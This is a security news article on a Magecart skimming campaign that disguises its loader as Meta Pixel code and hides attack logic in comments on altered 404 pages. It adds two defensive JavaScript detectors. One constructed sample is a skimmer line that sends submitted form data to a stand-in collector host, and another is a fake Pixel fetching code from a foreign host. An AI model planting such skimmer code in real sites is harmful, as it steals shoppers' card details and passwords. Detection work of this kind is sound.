Highlights:

  • The malware's loader stage embeds its code directly in the compromised web server's pages; the later stages do the data theft.
  • One reason Magecart persists is that its operators continually adapt and evolve their attack strategies.

The operators behind Magecart remain at the forefront of evading detection.

This week, Roman Lvovsky, an Israeli security researcher at Akamai Technologies, released a report detailing three obfuscation techniques recently observed in the company's telemetry. Magecart has been active for years, infecting numerous e-commerce websites, most notably those built on Magento and WooCommerce. The sites targeted by these new methods belong to food and other retail businesses.

The operators' Magecart workflow runs in three stages. Splitting the attack this way means many code analyzers will not immediately identify the injected code, which makes it harder to detect and remove. The split also makes it simpler to conceal the entire attack infrastructure and command servers, which extends the lifetime of the campaign.

In the loader stage, the malware's code is inserted directly into the web server's pages. The subsequent stages steal data such as credit card numbers and passwords.

According to Lvovsky, at least one of the techniques is novel; he had not seen it before. "It really surprised us," he wrote in his blog post.

The first-stage loader is disguised as a snippet of Meta Pixel, Facebook's widely deployed visitor and advertising tracking code. Because that snippet appears on so many legitimate sites, the loader readily evades malware detection tools.
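One check a site owner can run against this disguise, as an added example that is not code from the Akamai report or the campaign's loader: audit each inline script that looks like the Meta Pixel snippet and flag any URL in it whose host is not one Facebook actually uses. The genuine snippet loads fbevents.js from connect.facebook.net, so a block that keeps the fbq() boilerplate but fetches from another host deserves a closer look. The sample page, the host allowlist and the look-alike snippet with `cdn.example.invalid` are constructed for the example.

```javascript
// Added example, not code from the Akamai report: audit a page's <script>
// blocks for Meta Pixel look-alikes that talk to a non-Facebook host.

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const URL_RE = /https?:\/\/[^\s'"()<>]+/g;
// Strings that make a block look like the Pixel snippet.
const PIXEL_HINT_RE = /\bfbq\s*\(|fbevents\.js|facebook\.com\/tr\b/;
// Hosts the real Pixel talks to (assumed allowlist for this example).
const ALLOWED_HOSTS = new Set(['connect.facebook.net', 'www.facebook.com']);

function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch {
    return null; // not a parseable absolute URL
  }
}

// Returns one finding per Pixel-like <script> that references a non-Facebook URL.
function auditMetaPixelSnippets(html) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const text = `${m[1]} ${m[2]}`; // attributes plus body, so a src="" is covered too
    if (!PIXEL_HINT_RE.test(text)) continue;
    const foreign = (text.match(URL_RE) || []).filter((u) => {
      const h = hostOf(u);
      return h !== null && !ALLOWED_HOSTS.has(h);
    });
    if (foreign.length > 0) {
      findings.push({ preview: m[2].trim().slice(0, 60), foreign });
    }
  }
  return findings;
}

// Constructed samples. The legitimate snippet is abridged to the parts that matter here.
const LEGIT_PIXEL = `<script>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};t=b.createElement(e);
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '000000000000000');
fbq('track', 'PageView');
</script>`;

// Hypothetical look-alike: same boilerplate, but fbevents.js comes from elsewhere.
const FAKE_PIXEL = `<script>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};t=b.createElement(e);
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://cdn.example.invalid/fbevents.js');
fbq('init', '000000000000000');
</script>`;

const SAMPLE_PAGE = `<html><head>${LEGIT_PIXEL}\n${FAKE_PIXEL}</head><body></body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditMetaPixelSnippets(SAMPLE_PAGE));
}
```

Run it over the HTML of a checkout page: the legitimate snippet produces no finding, while the look-alike is reported with the foreign URL it loads. Scripts that build their URL at runtime from string fragments will not contain a literal `https://`, so treat an empty result as a first pass, not a clean bill of health.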

The novel technique is what makes this method so hard to spot: the later stages appear to request a bad URL, which returns the site's 404 error page. Such pages are an annoyance that visitors see often, but here the error page also carries a hidden piece of the malware. He wrote, "It was initially confusing and made us wonder if the skimmer was no longer active on the victim websites we found."

A closer examination of the 404 page's code, however, revealed the actual attack logic concealed in a comment string. Lvovsky found that the attacker had altered the site's default 404 error page, so that any request for a missing page returned the infected error page. It is an ingenious choice: the data-stealing and later stages of the Magecart toolchain can retrieve their code from a page that defenders rarely think to inspect.
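A defender-side check for the hiding place the report describes, added here as an example (it is not Akamai's code and does not reproduce the campaign's loader): fetch the body of a deliberately bad URL on your own site and scan the returned 404 page for HTML comments that carry a long base64 blob which decodes to something that looks like JavaScript. The sample 404 page, the `MARKER` label before the blob and the decoded payload are constructed for the example, and the script heuristics are an assumption; the comment marker the real campaign used is not reproduced here.

```javascript
// Added example, not code from the Akamai report: scan a 404 page's HTML for
// comments hiding a base64-encoded script, the pattern the article describes.

// HTML comments; [\s\S] so a comment body may span lines.
const COMMENT_RE = /<!--([\s\S]*?)-->/g;
// Base64 runs of at least 64 chars; shorter runs are usually hashes or version strings.
const B64_RE = /[A-Za-z0-9+/]{64,}={0,2}/g;
// Tokens that make decoded text look like script rather than data (assumed heuristics).
const JS_HINTS = [
  /\bfunction\b/, /\bdocument\./, /\bwindow\./, /\bfetch\(/,
  /\bXMLHttpRequest\b/, /\bnavigator\.sendBeacon\b/, /\beval\(/, /=>/,
];

function decodeBase64(str) {
  // Buffer ignores characters outside the base64 alphabet instead of throwing.
  return Buffer.from(str, 'base64').toString('utf8');
}

// Two or more hints: a single "function" inside a data blob is not enough.
function looksLikeScript(text) {
  return JS_HINTS.filter((re) => re.test(text)).length >= 2;
}

// Returns one finding per comment that hides a base64 blob decoding to script.
function scan404Page(html) {
  const findings = [];
  for (const m of html.matchAll(COMMENT_RE)) {
    const comment = m[1];
    for (const blob of comment.match(B64_RE) || []) {
      const decoded = decodeBase64(blob);
      if (looksLikeScript(decoded)) {
        findings.push({
          marker: comment.trim().split(/\s+/)[0], // label in front of the blob, if any
          blobLength: blob.length,
          decodedPreview: decoded.slice(0, 80),
        });
      }
    }
  }
  return findings;
}

// Constructed sample: the decoded text is only inspected, never executed.
const SAMPLE_PAYLOAD =
  "document.addEventListener('submit',function(e){fetch('https://collector.example.invalid/c'," +
  "{method:'POST',body:new FormData(e.target)})});";

// Constructed 404 page whose only oddity is the second comment.
const SAMPLE_404 = `<!DOCTYPE html>
<html><head><title>404 Not Found</title></head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<!-- cache: v2 -->
<!-- MARKER ${Buffer.from(SAMPLE_PAYLOAD).toString('base64')} -->
</body></html>`;

// The benign case: the same page with the suspicious comment removed.
const CLEAN_404 = SAMPLE_404.replace(/<!-- MARKER [^>]*-->\n/, '');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scan404Page(SAMPLE_404)); // one finding, marker "MARKER"
  console.log(scan404Page(CLEAN_404));  // []
}
```

Point it at the real thing with `fetch('https://shop.example/this-path-does-not-exist').then(r => r.text()).then(scan404Page)`; a finding means the error page is serving code, and the decoded preview tells you where it sends data. The minimum blob length and the two-hint threshold are tuning knobs: lower them if you want to see short, chunked payloads at the cost of more noise from legitimate inline data.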

One reason for Magecart's tenacity is that its operators keep evolving their attack methods, growing more sophisticated and dangerous as they find more effective evasion techniques. Site operators would do well to start scrutinizing even their error pages as a potential source of danger.